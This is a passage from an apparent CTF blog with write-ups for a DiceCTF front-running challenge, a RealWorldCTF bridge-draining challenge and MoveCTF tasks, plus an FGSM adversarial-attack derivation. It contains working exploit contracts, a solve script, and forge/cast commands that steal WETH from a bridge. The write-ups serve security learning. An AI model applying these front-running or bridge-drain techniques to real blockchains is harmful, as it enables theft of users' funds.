    }

    function expireChallenge() public onlyOwner {
        currentChallenge = 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff;
    }

    function solveChallenge(
        bytes calldata solution,
        uint256 solver_nonce
    ) public {
        if (currentBlock != block.number) {
            revert("Too late");
        }
        if (currentChallenge == 0) {
            revert("Challenge is not yet active");
        }
        if (
            currentChallenge ==
            0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
        ) {
            revert("Challenge has expired");
        }
        uint256 _currentChallenge = currentChallenge;
        assembly {
            // Free memory pointer
            let pointer := mload(0x40)
            let base_len := solution.length
            mstore(pointer, base_len)
            mstore(add(pointer, 0x20), 1)
            mstore(add(pointer, 0x40), 5568)
            calldatacopy(add(pointer, 0x60), solution.offset, base_len)
            mstore8(add(add(pointer, 0x60), base_len), 2)
            let exp_start := add(add(add(pointer, 0x60), base_len), 1)
            for {
                let i := 32
            } lt(i, 5568) {
                i := add(i, 32)
            } {
                mstore(
                    add(exp_start, i),
                    0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
                )
            }
            mstore(
                exp_start,
                0x1ffffffffffffffffffffffffffffffffffffffffffffffffffff
            )

            let ret := staticcall(
                gas(),
                0x05,
                pointer,
                sub(add(exp_start, 5568), pointer),
                exp_start,
                5568
            )
            if iszero(ret) {
                mstore(0, 0x1)
                revert(0, 32)
            }
            let result := mload(add(exp_start, 5536))
            let success := 0
            if eq(result, _currentChallenge) {
                for {
                    let i := 0
                } lt(i, 5536) {
                    i := add(i, 32)
                } {
                    let check := mload(add(exp_start, i))
                    if gt(check, 0) {
                        mstore(0, 0x2)
                        revert(0, 32)
                    }
                }
                success := 1
            }
            if eq(not(result), _currentChallenge) {
                for {
                    let i := 32
                } lt(i, 5536) {
                    i := add(i, 32)
                } {
                    let check := mload(add(exp_start, i))
                    if gt(add(check, 1), 0) {
                        mstore(0, 0x3)
                        revert(0, 32)
                    }
                }
                {
                    let check := mload(exp_start)
                    if iszero(
                        eq(
                            check,
                            0x1ffffffffffffffffffffffffffffffffffffffffffffffffffff
                        )
                    ) {
                        mstore(0, 0x4)
                        revert(0, 32)
                    }
                }
                success := 1
            }
            if iszero(success) {
                mstore(0, 0x5)
                revert(0, 32)
            }
        }
        emit GotFlag(solver_nonce);
    }
}

The 0x5 is a precompiled contract supporting BigModExp operation.

https://github.com/ethereum/go-ethereum/blob/master/core/vm/contracts.go#L61.

https://app.dedaub.com/decompile?md5=e20d9587c62f0676598157609010dc69

decompiled

calldata

memory layout

return

memory layout

(left-zero-pad)

Consequently,. the solveChallenge() requires a caller to satisfy one of two equations.

1. solution^2 mod p == current_challenge

2. solution^2 mod p == p - current_challenge

solve.py

import sys
import gmpy2

MODULUS = 2**44497-1

def sloth_root(x, p):
    exponent = (p + 1) // 4
    x = gmpy2.powmod(x, exponent, p)
    return int(x)

def solve_challenge(x):
    y = sloth_root(x, MODULUS)
    return y

def main():
    chal = int(sys.argv[1])
    sol = solve_challenge(chal)
    print(sol.to_bytes((sol.bit_length() + 7) // 8, 'big').hex())

if __name__ == '__main__':
    main()

MODULUS is a prime such that p = 3 mod 4

https://lcn2.github.io/mersenne-english-name/m44497/prime-c.html

So we can find a modulus of square root with the simple way.

https://math.stackexchange.com/questions/1273690/when-p-3-pmod-4-show-that-ap1-4-pmod-p-is-a-square-root-of-a

However, the bit length of MODULUS is very very very long and it takes more than 5s in my environmnet.

infra

Welcome to Floordrop: Time Warp! Can you pick up the flag in time?
  1. Solve a mock challenge (extra time to solve)
  2. Solve the real challenge
  3. Exit
Please choose an option: 1
Preparing challenge...
[2024-02-04 12:21:16.354597] Deploying challenge contract...
[2024-02-04 12:21:21.525273] Challenge contract deployed at 0x2356377E7353FE956fd02A8A8eb84ADd167bDDef
[2024-02-04 12:21:21.526494] Challenge nonce: 0xdf35c0a630e7abdb373831b7c47e79abcf3235fbf9e313100f16a6a2cfe7b483
[2024-02-04 12:21:21.526522] Use this nonce when calling solveChallenge, i.e. solveChallenge(solution, nonce), remember solution is big endian bytes, and nonce is uint256
[2024-02-04 12:21:21.526550] MOCK: setChallenge will be called with: 129121721261020899191208319706888856561
[2024-02-04 12:21:21.526560] MOCK: Waiting for 5 seconds to give you a chance to compute the solution...
[2024-02-04 12:21:26.861795] The challenge will be set momentarily...
[2024-02-04 12:21:31.490502] Sent setChallenge transaction 0xa812fd2c4b2b8178a07dca553b9194998fdfdd8e5cc50b5d1e4225d6f0ec99df; waiting 2secs before sending expireChallenge transaction...
[2024-02-04 12:21:33.490893] Sent expireChallenge transaction 0xeb3be603107e2991284ae23af038bc33bdf8c9fa04a2576d91eb48140f3e00b4
[2024-02-04 12:21:33.490932] Waiting for transactions to finalize...
[2024-02-04 12:21:41.642236] Set challenge transaction finalized in block 28193
[2024-02-04 12:21:41.642275] Expire challenge transaction finalized in block 28193
[2024-02-04 12:21:42.322810] We did not find the correct GotFlag event. Better luck next time!

Welcome to Floordrop: Time Warp! Can you pick up the flag in time?
  1. Solve a mock challenge (extra time to solve)
  2. Solve the real challenge
  3. Exit
Please choose an option: 2
Preparing challenge...
[2024-02-04 12:46:33.581271] Deploying challenge contract...
[2024-02-04 12:46:41.306614] Challenge contract deployed at 0x4c9897d44F9cf572BdEC8acc6C92f4787aeE95Ba
[2024-02-04 12:46:41.307731] Challenge nonce: 0xef4e22d43cc66ead910b8f7b87ddf4b591f3e1601ddbb4495e888bc28f8a3570
[2024-02-04 12:46:41.307751] Use this nonce when calling solveChallenge, i.e. solveChallenge(solution, nonce), remember solution is big endian bytes, and nonce is uint256
[2024-02-04 12:46:41.606216] The challenge will be set momentarily...
[2024-02-04 12:46:51.391412] Sent setChallenge transaction 0x1cb42eaf917bafad523ba429bccb08309d7d863fb3912f722a3be7b692a79cc1; waiting 2secs before sending expireChallenge transaction...
[2024-02-04 12:46:53.401424] Sent expireChallenge transaction 0x7517bec9d5842cfc015bf862e1eccd41b2427e56f09cae6854e602c82e7274b0
[2024-02-04 12:46:53.401467] Waiting for transactions to finalize...
[2024-02-04 12:47:01.375045] Set challenge transaction finalized in block 28345
[2024-02-04 12:47:01.375080] Expire challenge transaction finalized in block 28345
[2024-02-04 12:47:01.722136] We did not find the correct GotFlag event. Better luck next time!

server timeline

When a user connects to the server using nc, the server proceeds with the following steps.

1. deploy a challenge contract

2. call setChallenge()

3. call expireChallenge()

4. check GotFlag event

The difference between mock and real is that the mock provides the value of current_challenge in advance, giving a user time to calculate the square root.

However, the real's current_challenge is not provided, so we have to read the setChallenge() transaction and extract it from the calldata.

real challenge submission timeline

If we assume a minimum computation time of 5s, we won't be able to call solveChallenge() in time before expireChallenge() transaction is generated.

First, I explored how transaction ordering within a block works thorugh a block explorer.

As you can see from the genesis.json, block are generated every 10s uisng the PoA.

This is the transaction ordering mechanism of DiceChain discovered thorugh various tests.

1. accurate nonce if from field crashes

2. higher gasPrice

3. earlier received time

In the situation above, if all gas prices are the same, the pending transactions and ordering results would be as follows:

pending txs

receive time	gas price	from	tx
T	G	server	setChallenge()
T+1	G	server	expireChallenge()
T+2	G	user	solveChallenge()

ordering result

execute order	receive time	gas price	from	tx
1	T	G	server	setChallenge()
2	T+1	G	server	expireChallenge()
3	T+2	G	user	solveChallenge()

According to the block explorer, the gas prices of the server is 2000000016.

block explorer

If user's gas price is higher than the server, the pending transactions and ordering results would be as follows:

pending txs

receive time	gas price	from	tx
T	G	server	setChallenge()
T+1	G	server	expireChallenge()
T+2	G+1	user	solveChallenge()

ordering result

execute order	receive time	gas price	from	tx
1	T+2	G+1	user	solveChallenge ()
2	T+1	G	server	setChallenge ()
3	T+2	G	user	expireChallenge ()

solveChallenge() would be reverted because setChallenge() isn't called yet.

idea

For the first attempt, I considered executing the square root operation in the bigmodexp contract.

However, trying to perform the calculation with bigmodexp in the EVM, which takes 5s in python, resulted in an out-of-gas.

contract Solver {
    function fjiodsafjoidsafjasdoiji() public {
        address payable addr = payable(msg.sender);
        selfdestruct(addr);
    }

    function dniovandsvoinasdvoidn(
        address target,
        uint256 nonce,
        bytes calldata chal, 
        bytes calldata eexp 
    ) public {
        bytes memory mem = new bytes(5568);

        assembly {
            // Free memory pointer
            let pointer := mload(0x40)
            let base_len := chal.length
            let exp_len := eexp.length
            mstore(pointer, base_len) 
            mstore(add(pointer, 0x20), exp_len)  
            mstore(add(pointer, 0x40), 5568) 
            calldatacopy(add(pointer, 0x60), chal.offset, base_len) 
            calldatacopy(add(add(pointer, 0x60), base_len), eexp.offset, exp_len) 
            let exp_start := add(add(add(pointer, 0x60), base_len), exp_len) 
            for { let i := 32 } lt(i, 5568) { i := add(i, 32) } {
                mstore(
                    add(exp_start, i),
                    0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
                )
            }

            mstore(
                exp_start,
                0x1ffffffffffffffffffffffffffffffffffffffffffffffffffff
            )

            let ret := staticcall(
                gas(),
                0x05,
                pointer, 
                sub(add(exp_start, 5568), pointer), 
                exp_start, 
                5568
            ) 

            let memPtr := add(mem, 0x20)
            for { let i := 0 } lt(i, 5568) { i := add(i, 0x20) } {
                let data := mload(add(exp_start, i))
                mstore(add(memPtr, i), data)
            }
        }

        ProofOfWork(target).solveChallenge(mem, nonce);
    }
}

The second attempt involved using the gas limit of 30,000,000 per block to consume all the gas.

block explorer

pending txs

receive time	gas price	from	tx	gas
T	G	server	setChallenge()	60,000
T+1	G+2	user	bomb()	27,000,000
T+2	G	server	expireChallenge()
T+3	G+1	user	solveChallenge()

ordering result

execute order	receive time	gas price	from	tx
1	T+1	G+2	user	bomb()
2	T	G	server	setChallenge()
mined	-	-	-	-
3	T+3	G+1	server	solveChallenge()
4	T+2	G	user	expireChallenge ()

By calling gas bomb, the strategy was to consume all the gas in a block, delaying the execution of transactions solveChallenge() and expireChallenge() to the next block.

This means that by gaining the 10s, there is sufficient time to perform the square root calculation.

However, in this case, solveChallenge() would throw a "too late" error,

To leverage the fact that the submission order and execution order of transactions can vary based on gasPrice and gasLimit, I divided the solveChallenge() process into two steps.

setStorage(): Update the storage variable to ensure that solveChallenge() is called successfully.

callSolveChallenge(): Call solveChallenge() with the value stored in the storage variable.

In other words, by using bomb() to secure 10s, the last submitted transaction, setStorage(), will have the highest priority in the next block, ensuring the ideal execution order.

pending txs

receive time	gas price	from	tx
T	G	server	setChallenge()
T+1	G+2	user	bomb()
T+2	G	user	callSolveChallenge()
T+3	G	server	expireChallenge()
T+4	G+1	user	setStorage()

ordering result

execute order	receive time	gas price	from	tx	gas
1	T+1	G+2	user	bomb()	30,000,000
mined	-	-	-	-
2	T+4	G+1	user	setStorage ()
3	T	G	server	setChallenge()
4	T+2	G	user	callSolveChallenge()
5	T+3	G	server	expireChallenge()

tx submission timeline

solve

The block explorer doesn't support selfdestruct().

Bomb

contract Bomb {
    bytes st1;
    bytes st2;

    function adfgiuohdfghj(bytes calldata data) public {
        bytes memory mem = data;
        st1 = mem;
        st2 = mem;
    }

    function fjadsifnvadsiovaiosv() public {
        selfdestruct(payable(msg.sender));
    }
}

Solver

contract Solver {
    uint256 nonce;
    bytes mem;
    address target;

    function af9678d1() public {
        address payable addr = payable(msg.sender);
        selfdestruct(addr);
    }

    function ef8feqw8fd(uint256 _nonce, address _target, bytes calldata _mem) public {
        nonce = _nonce;
        mem = _mem;
        target = _target;
    }

    function sgert6789() public {
        ProofOfWork(target).solveChallenge(mem, nonce);
    }
}

solve.py

from web3 import Web3
import json
from solc import compile_source
import time
import gmpy2
from pwn import *
from eth_abi import encode

w3 = Web3(Web3.HTTPProvider("https://floordrop-rpc.hpmv.dev/"))

#Check Connection
t=w3.is_connected()
print(t)

MODULUS = 2**44497-1

def sloth_root(x, p):
    exponent = (p + 1) // 4
    x = gmpy2.powmod(x, exponent, p)
    return int(x)

def solve_challenge(x):
    y = sloth_root(x, MODULUS)
    return y

# To avoid nonce duplicate
# fake private keys
prikey = '0x07b1c315909058c038bc2d3dcd0382c2d64c378c6d6200fb26615d0bacae63bc'
prikey2 = '0x07b1c315909058c038bc2d3dcd0382c2d64c378c6d6200fb26615d0bacae63bd'
prikey3 = '0x07b1c315909058c038bc2d3dcd0382c2d64c378c6d6200fb26615d0bacae63be'

# Create a signer wallet
PA=w3.eth.account.from_key(prikey)
PA2=w3.eth.account.from_key(prikey2)
PA3=w3.eth.account.from_key(prikey3)
myAddr=PA.address
myAddr2=PA2.address
myAddr3=PA3.address

nonce_1 = w3.eth.get_transaction_count(myAddr)
nonce_2 = w3.eth.get_transaction_count(myAddr2)
nonce_3 = w3.eth.get_transaction_count(myAddr3)
chainId = w3.eth.chain_id


r = remote("mc.ax", 32123)

r.sendlineafter("Please choose an option: ", "2")

r.recvuntil("Challenge contract deployed at ")
cont_addr = r.recvuntil("\n")[:-1].decode()
r.recvuntil("Challenge nonce: ")
nonce = int(r.recvuntil("\n")[:-1].decode(), 16)

r.recvuntil("The challenge will be set momentarily...")
time.sleep(8.8)


# bomb
calldata = "be4ece18" + encode(['bytes'], [b"b" * 0x10000]).hex()
func_call = {
    "from": myAddr,
    "to": "0xFf8d2E9B697d5556b7fbC568a0E355475f8Dd36D",
    "nonce": nonce_1,
    "gasPrice": int(2000000016 + 10),
    "value": 0,
    "chainId": chainId,
    "data": calldata,
    "gas": 30000000
}
signed_tx = w3.eth.account.sign_transaction(func_call, prikey)
w3.eth.send_raw_transaction(signed_tx.rawTransaction)

# callSolveChallenge()
for i in range(5):
    calldata = "8f93c394"
    func_call = {
        "from": myAddr3,
        "to": "0xCE3E75F8eBA5F77290a7F1B175C9820D38eb9F41",
        "nonce": nonce_3 + i,
        "gasPrice": 2000000016,
        "value": 0,
        "chainId": chainId,
        "data": calldata,
        "gas": 1000000
    }
    signed_tx = w3.eth.account.sign_transaction(func_call, prikey3)
    w3.eth.send_raw_transaction(signed_tx.rawTransaction)



r.recvuntil("Sent setChallenge transaction ")
tx1 = r.recvuntil(";")[:-1]
raw1 = w3.eth.get_transaction(tx1.decode())
hint = raw1['input'][4:].hex()
chal = int(hint, 16)
sol = solve_challenge(chal)
answer = sol.to_bytes((sol.bit_length() + 7) // 8, 'big')

# setStorage()
calldata = "c5a8a95b" + encode(['uint256', 'address', 'bytes'], [nonce, cont_addr, answer]).hex()
func_call = {
    "from": myAddr2,
    "to": "0xCE3E75F8eBA5F77290a7F1B175C9820D38eb9F41",
    "nonce": nonce_2,
    "gasPrice": 2000000016 + 5,
    "value": 0,
    "chainId": chainId,
    "data": calldata,
    "gas": 1040000
}
signed_tx = w3.eth.account.sign_transaction(func_call, prikey2)
w3.eth.send_raw_transaction(signed_tx.rawTransaction)

r.interactive()

dice{fr0ntrunn1ng_1s_n0t_ju5t_f0r_s4ndw1ch1ng_f8d9f834}

Fast Gradient Sign Method (FGSM attack) proof

gss1 — Fri, 2 Feb 2024 19:20:57 +0900

FGSM

FGSM wants to move in the direction that crosses the boundary via one jump like one-gadget.

$ x'=x+r $, pertubated image, can be created by an equation:

$ x'=x+\epsilon \cdot sign(\nabla_{x} L(x, y)) $

Although the attack code is easily implemented by few lines,

I think we should study why $ x+r $ can be expressed by the above equation in some constraints.

https://pytorch.org/tutorials/beginner/fgsm_tutorial.html

$$ \text{For an image } x \in \mathbb{R}^p \text{ and its correct label } y \in \{1,2,..., K\}, \newline \text{the untargeted FGSM can be defined as the following optimization problem:} \\[6pt] r^{*} \in \argmax_{r\in R^p} \ L(x, y)+r^{T}\nabla_{x} L(x, y) \ \text{subject to} \ ||r||_{\infty} \leq \epsilon \\[6pt] \text{where } \epsilon >0 \text{ is a hyperparameter and } L \text{ is the cross-entropy function.} \newline \text{Suppose that } L(x,y) \text{is continuously differentiable in terms of the first argument } x. \newline \text{Using the KKT conditions, show that the adversarial example } \newline x'=x+r^* \text{ is expressed by } x'=x+\epsilon \cdot sign(\nabla_{x} L(x, y)). $$ $ \boldsymbol{\mathbf{proof)}} $ $$ \text{The optimization problem we need to have to solve is as follows:} \\[6pt] \max_{r\in R^p} \ L(x+r, y) \ \text{subject to} \ ||r||_{\infty} \leq \epsilon \\[6pt] \text{Using the first-order Taylor approximation, the following equation can be expressed.} \\[6pt] \max_{r \in R^p} \ L(x, y)+r^{T}\nabla_{x} L(x, y) \ \text{subject to} \ ||r||_{\infty} \leq \epsilon \\[20pt] \text{Given that }||r||_\infty \text{ is defiend as } \max_{i} |r_{i}| \text{, the above problem can be express as follows:} \\[6pt] \max_{r \in R^p} \ L(x, y)+r^{T}\nabla_{x} L(x, y) \ \text{s.t.} \ r_{i} \leq \epsilon , \ \ r_{i} \leq -\epsilon \ , \ i=1,..., \ p\\[6pt] \text{Focusing on the specific term, we consider:} \\[6pt] \max_{r \in R^p} \ r^{T}\nabla_{x} L(x, y) \ \text{s.t.} \ r_{i} \leq \epsilon , \ \ r_{i} \leq -\epsilon ,\ i=1,..., \ p \\[20pt] \text{To employ the KKT conditions, we transform the problem into one of finding a} \newline \text{ local minimizer} \\[6pt] \min_{r \in R^p} \ -r^{T}\nabla_{x} L(x, y) \ \text{s.t.} \ r_{i} \leq \epsilon , \ \ r_{i} \leq -\epsilon ,\ i=1,..., \ p \\[20pt] \text{By converting the problem into the form of a Lagrangian function and examining}\newline \text{the KKT conditions, we can analyze the necessary conditions for optimality in the} \newline \text{presence of constraints.} \\[10pt] \mathcal{L(r,\alpha,\beta)}=\ -r^{T}\nabla_{x} L(x, y)-\sum^{p}_{i=1}{\alpha_{i}(\epsilon-r_{i}})-\sum^{p}_{i=1}{\beta_{i}(\epsilon+r_{i}}) \\[10pt] \left\{ \begin{aligned} & [\nabla\mathcal{L(r,\alpha,\beta)}]_i=-[\nabla_{x} L(x, y)]_i+\alpha_i-\beta_i=0 \ \cdots \text{Stationarity} \\ & -\epsilon \leq r_i \leq \epsilon \ \cdots \text{Feasibility} \\ & \alpha_i \geq 0, \ \beta_i \geq 0 \ \cdots \text{Dual Feasibility} \\ & \alpha_{i}(\epsilon-r_i)=0, \beta_{i}(\epsilon+r_i)=0 \ \ \cdots \text{Complementary Slackness} \end{aligned} \right. \\[10pt] \text{if} \ |r_i|<\epsilon, \text{then } \alpha_i=0, \ \beta_i=0. \Rightarrow -[\nabla_{x} L(x, y)]_i = 0 \\[6pt] \text{if} \ r_i=\epsilon, \text{then } \beta_i=0. \Rightarrow \alpha_i =[\nabla_{x} L(x, y)]_i \geq 0 \\[6pt] \text{if} \ r_i=-\epsilon, \text{then } \alpha_i=0. \Rightarrow \beta_i =-[\nabla_{x} L(x, y)]_i \geq 0 \\[10pt] \text{thus}\\[10pt] r_i=\left\{ \begin{aligned} & +\epsilon \ \ \ \text{if } [\nabla_{x} L(x, y)]_i > 0 \\ & -\epsilon \ \ \ \text{if } [\nabla_{x} L(x, y)]_i < 0 \\ & 0 \ \ \ \ \ \ \ \text{otherwise} \end{aligned} \right. \\ \text{For convenience in the 'otherwise' case, we calculate it as zero.} \\[10pt] \text{therefore } x'=x+\epsilon \cdot sign(\nabla_{x} L(x, y)) $$

RealWorldCTF 2024 - blockchain(safebridge)

gss1 — Sun, 28 Jan 2024 13:08:09 +0900

analysis

    function deploy(address system) internal returns (address challenge) {
        vm.createSelectFork(vm.envString("L1_RPC"));
        vm.startBroadcast(system);
        address relayer = getAdditionalAddress(0);
        L1CrossDomainMessenger l1messenger = new L1CrossDomainMessenger(relayer);
        WETH weth = new WETH();
        L1ERC20Bridge l1Bridge =
            new L1ERC20Bridge(address(l1messenger), Lib_PredeployAddresses.L2_ERC20_BRIDGE, address(weth));

        weth.deposit{value: 2 ether}();
        weth.approve(address(l1Bridge), 2 ether);
        l1Bridge.depositERC20(address(weth), Lib_PredeployAddresses.L2_WETH, 2 ether);

        challenge = address(new Challenge(address(l1Bridge), address(l1messenger), address(weth)));
        vm.stopBroadcast();
    }

contract Challenge {
    address public immutable BRIDGE;
    address public immutable MESSENGER;
    address public immutable WETH;

    constructor(address bridge, address messenger, address weth) {
        BRIDGE = bridge;
        MESSENGER = messenger;
        WETH = weth;
    }

    function isSolved() external view returns (bool) {
        return IERC20(WETH).balanceOf(BRIDGE) == 0;
    }
}

Our goal is to steal the 2 weth stored in L1Bridge.

root cause

contract L1ERC20Bridge is IL1ERC20Bridge, CrossDomainEnabled {
    function _initiateERC20Deposit(address _l1Token, address _l2Token, address _from, address _to, uint256 _amount)
        internal
    {
        IERC20(_l1Token).safeTransferFrom(_from, address(this), _amount);

        bytes memory message;
        if (_l1Token == weth) {
            message = abi.encodeWithSelector(
                IL2ERC20Bridge.finalizeDeposit.selector, address(0), Lib_PredeployAddresses.L2_WETH, _from, _to, _amount
            ); 
        } else {
            message =
                abi.encodeWithSelector(IL2ERC20Bridge.finalizeDeposit.selector, _l1Token, _l2Token, _from, _to, _amount);
        }

        sendCrossDomainMessage(l2TokenBridge, message);
        deposits[_l1Token][_l2Token] = deposits[_l1Token][_l2Token] + _amount;

        emit ERC20DepositInitiated(_l1Token, _l2Token, _from, _to, _amount);
    }

In L1ERC20Bridge, _initiateERC20Deposit does not check if _l2Token is L2_WETH when its _l1Token equals weth.

As a result, L2_WETH is minted in the L2 chain, but deposits[weth][non L2_weth] of the L1 chain is updated.

If we burn L2_WETH when we return from L2 to L1, it becomes deposits[L1_weth][L2_weth] -= amount

If we burn non L2_weth, it becomes deposits[L1_weth][non L2_weth] -= amount

We can deploy the malicious contract for the non L2_weth, providing us with infinite minting.

Consequently, we can drain the weth held by the bridge as much as we send the amount of the weth to the L2.

solve

contract MyToken is IL2StandardERC20, ERC20 {
    address public l1Token;

    constructor(address _l1Token, string memory _name, string memory _symbol) ERC20(_name, _symbol) {
        l1Token = _l1Token;
        mint(msg.sender, 2 ether);
    }

    function supportsInterface(bytes4 _interfaceId) public pure returns (bool) {
        bytes4 firstSupportedInterface = bytes4(keccak256("supportsInterface(bytes4)")); // ERC165
        bytes4 secondSupportedInterface =
            IL2StandardERC20.l1Token.selector ^ IL2StandardERC20.mint.selector ^ IL2StandardERC20.burn.selector;
        return _interfaceId == firstSupportedInterface || _interfaceId == secondSupportedInterface;
    }

    function mint(address _to, uint256 _amount) public virtual {
        _mint(_to, _amount);

        emit Mint(_to, _amount);
    }

    function burn(address _from, uint256 _amount) public virtual {
        _burn(_from, _amount);

        emit Burn(_from, _amount);
    }
}

contract AttackL2 {
    address internal constant L2_CROSS_DOMAIN_MESSENGER = 0x420000000000000000000000000000000000CAFe;
    address internal constant L2_ERC20_BRIDGE = 0x420000000000000000000000000000000000baBe;
    address internal constant L2_WETH = payable(0xDeadDeAddeAddEAddeadDEaDDEAdDeaDDeAD0000);

    MyToken public myToken; 
    L2ERC20Bridge public l2Bridge = L2ERC20Bridge(0x420000000000000000000000000000000000baBe);
    constructor (address l1Weth) {
        myToken = new MyToken(l1Weth, "g", "g");
    }

    function attack() public {
        l2Bridge.withdrawTo(L2_WETH, address(this), 2 ether);
        l2Bridge.withdrawTo(address(myToken), address(this), 2 ether);
    }
}

contract AttackL1 {
    Challenge public chall;
    L1ERC20Bridge public l1Bridge;
    WETH public weth;
    
    constructor (address challenge) payable {
        chall = Challenge(challenge);
        l1Bridge = L1ERC20Bridge(chall.BRIDGE());
        weth = WETH(payable(chall.WETH()));
        weth.deposit{value: 2 ether}();
    }

    function attack(address l2Token, address attacker) public {
        weth.approve(address(l1Bridge), 4 ether);
        l1Bridge.depositERC20To(address(weth), l2Token, attacker, 2 ether);
    }
}

forge create AttackL2 --private-key "0x6ebc7473272ac5cab0bdb4f00b90f01a80525e3b2c889d438a409c8bdd56b672" --rpc-url "http://47.251.56.125:8545/YmjZZzFkERScgqedKjffkurc/l2" --constructor-args "0xcB9B043B2e1fE63C5750bc7CCc34b0975D311F55"
forge create AttackL1 --private-key "0x6ebc7473272ac5cab0bdb4f00b90f01a80525e3b2c889d438a409c8bdd56b672" --rpc-url "http://47.251.56.125:8545/YmjZZzFkERScgqedKjffkurc/l1" --value 2ether --constructor-args "0xFF0E79fbD76457dADDF9176dE51C8635639A6e1c"
cast send "0x914334f7459449a02Ac5Fcac9b141422e5843363" --private-key "0x6ebc7473272ac5cab0bdb4f00b90f01a80525e3b2c889d438a409c8bdd56b672" --rpc-url "http://47.251.56.125:8545/YmjZZzFkERScgqedKjffkurc/l1" "attack(address,address)" "0x6064D7A2ddf3424BBEe75722952b4A28A00a67F3" "0x914334f7459449a02Ac5Fcac9b141422e5843363"
cast send "0x914334f7459449a02Ac5Fcac9b141422e5843363" --private-key "0x6ebc7473272ac5cab0bdb4f00b90f01a80525e3b2c889d438a409c8bdd56b672" --rpc-url "http://47.251.56.125:8545/YmjZZzFkERScgqedKjffkurc/l2" "attack()"

rwctf{yoU_draINED_BriD6E}

2024MoveCTF

gss1 — Sun, 28 Jan 2024 12:30:33 +0900

Checkin

    public entry fun get_flag(string: vector<u8>, ctx: &mut TxContext) {
        assert!(string == b"MoveBitCTF",ESTRING);
        event::emit(Flag {
            sender: tx_context::sender(ctx),
            flag: true,
        });
    }

Since get_flag is a entry function, we just call that fuction using sui-client.

sui client call \
--package 0xbef0fd782ca68ff089fba9c06ee4b6ceaf1b5aaaa8bae45e66fa25efd8a7fec4 \
--module checkin \
--function get_flag \
--args "MoveBitCTF" \
--gas-budget 100000000

dynamic_matrix_traversal

    fun up(m: u64, n: u64): u64 {
        let f: vector<vector<u64>> = vector::empty();
        let i: u64 = 0;
        while (i < m) {
            let row: vector<u64> = vector::empty();
            let j: u64 = 0;
            while (j < n) {
                if (j == 0 || i == 0) {
                    vector::push_back(&mut row, 1);
                } else {
                    let f1 = *vector::borrow(&f, i - 1);
                    let j1 = *vector::borrow(&row, j - 1);
                    let val = *vector::borrow(&f1, j) + j1;
                    vector::push_back(&mut row, val);
                };
                j = j + 1;
            };
            vector::push_back(&mut f, row);
            i = i + 1;
        };
        let fr = *vector::borrow(&f, m - 1);
        let result = *vector::borrow(&fr, n-1);
        result
    }

We have to find pairs of m and n such that up(m, n) is equal to 14365 and 2794155.

found_mn = []
def up(m, n):
    f = [[0 for _ in range(n)] for _ in range(m)]
    for i in range(m):
        for j in range(n):
            if j == 0 or i == 0:
                f[i][j] = 1
            else:
                f[i][j] = f[i-1][j] + f[i][j-1]
    return f[m-1][n-1]

for m in range(1, 300):
    for n in range(1, 300):
        if len(found_mn) == 2:
            break
        if up(m, n) in [14365, 2794155]:
            found_mn.append((m, n))

print(found_mn)

subset

The subset problem is a well-known subject of crypto challenge. This problem could be solved by low-density attack. The subset1 and subset2 are easily solved through brute-force but subset3 isn't. So sage script is needed.

class HighDensityException(Exception):
    pass


class LOAttack:

    def __init__(self, array, target_sum, try_on_high_density=False):
        self.array = array
        self.n = len(self.array)
        self.target_sum = target_sum
        self.density = self._calc_density()
        self.try_on_high_density = try_on_high_density

    def _calc_density(self):
        return self.n / log(max(self.array), 2)

    def _check_ans(self, ans):
        calc_sum = sum(map(lambda x: x[0] * x[1], zip(self.array, ans)))
        return self.target_sum == calc_sum

    def solve(self):
        if self.density >= 0.6463 and not self.try_on_high_density:
            raise HighDensityException()

        # 1. Initialize Lattice
        L = Matrix(ZZ, self.n + 1, self.n + 1)
        N = ceil(self.n ^ 0.5 / 2)
        for i in range(self.n + 1):
            for j in range(self.n + 1):
                if j == self.n and i < self.n:
                    L[i, j] = N * self.array[i]
                elif j == self.n:
                    L[i, j] = N * self.target_sum
                elif i == j:
                    L[i, j] = 1
                else:
                    L[i, j] = 0

        # 2. LLL!
        B = L.LLL()

        # 3. Find answer
        for i in range(self.n + 1):
            if B[i, self.n] != 0:
                continue

            if all(-1 <= v <= 0 for v in B[i]):
                ans = [-B[i, j] for j in range(self.n)]
                if self._check_ans(ans):
                    return ans

        # Failed to find answer
        return None


class CJLOSSAttack:

    def __init__(self, array, target_sum, try_on_high_density=False):
        self.array = array
        self.n = len(self.array)
        self.target_sum = target_sum
        self.density = self._calc_density()
        self.try_on_high_density = try_on_high_density

    def _calc_density(self):
        return self.n / log(max(self.array), 2)

    def _check_ans(self, ans):
        calc_sum = sum(map(lambda x: x[0] * x[1], zip(self.array, ans)))
        return self.target_sum == calc_sum

    def solve(self):
        if self.density >= 0.9408 and not self.try_on_high_density:
            raise HighDensityException()

        # 1. Initialize Lattice
        L = Matrix(ZZ, self.n + 1, self.n + 1)
        N = ceil(self.n ^ 0.5 / 2)
        for i in range(self.n + 1):
            for j in range(self.n + 1):
                if j == self.n and i < self.n:
                    L[i, j] = 2 * N * self.array[i]
                elif j == self.n:
                    L[i, j] = 2 * N * self.target_sum
                elif i == j:
                    L[i, j] = 2
                elif i == self.n:
                    L[i, j] = 1
                else:
                    L[i, j] = 0

        # 2. LLL!
        B = L.LLL()


        # 3. Find answer
        for i in range(self.n + 1):
            if B[i, self.n] != 0:
                continue

            if all(v == -1 or v == 1 for v in B[i][:self.n]):
                ans = [ (-B[i, j] + 1) // 2 for j in range(self.n)]
                print(ans)
                if self._check_ans(ans):
                    return ans

        # Failed to find answer
        return None


# Example
if __name__ == "__main__":
    from sage.misc.prandom import randint
    import random

    arr = [730983191275949878802706287425, 738747747182330870358722868390, 680758618870742741205069880873, 736839950200009681117675478653, 821817898783913524938769447793, 1062662929594640521216588473346, 804078432654564652353003934418, 987354119502628442223858924307, 974121064863569224403070119631, 766517359152261667697388282513, 1115664590742545309936719501477, 1254953696369781959586392455121, 708965201854329468418120106125, 803407590419087414384275360152, 680994772249007776444211943134, 1209641410992728376967530103489, 1022807828605992586908433214193, 708760513774702586605766399361, 1146510154260900723919247238072, 1071639493717448858831225830703, 704595551001390485227577881300, 666267842956106233584633761922, 916484600070887410197321230180, 869547011380359879465486127051, 1146284238922586539801525899580, 960791406315307372223215677265, 846714517434965788941098273736, 943109174072029103168835446476, 1186748483275224241752870865835, 810729587696497173434925395865, 1081140748486010470135469081647, 1117896979087650487375387404086, 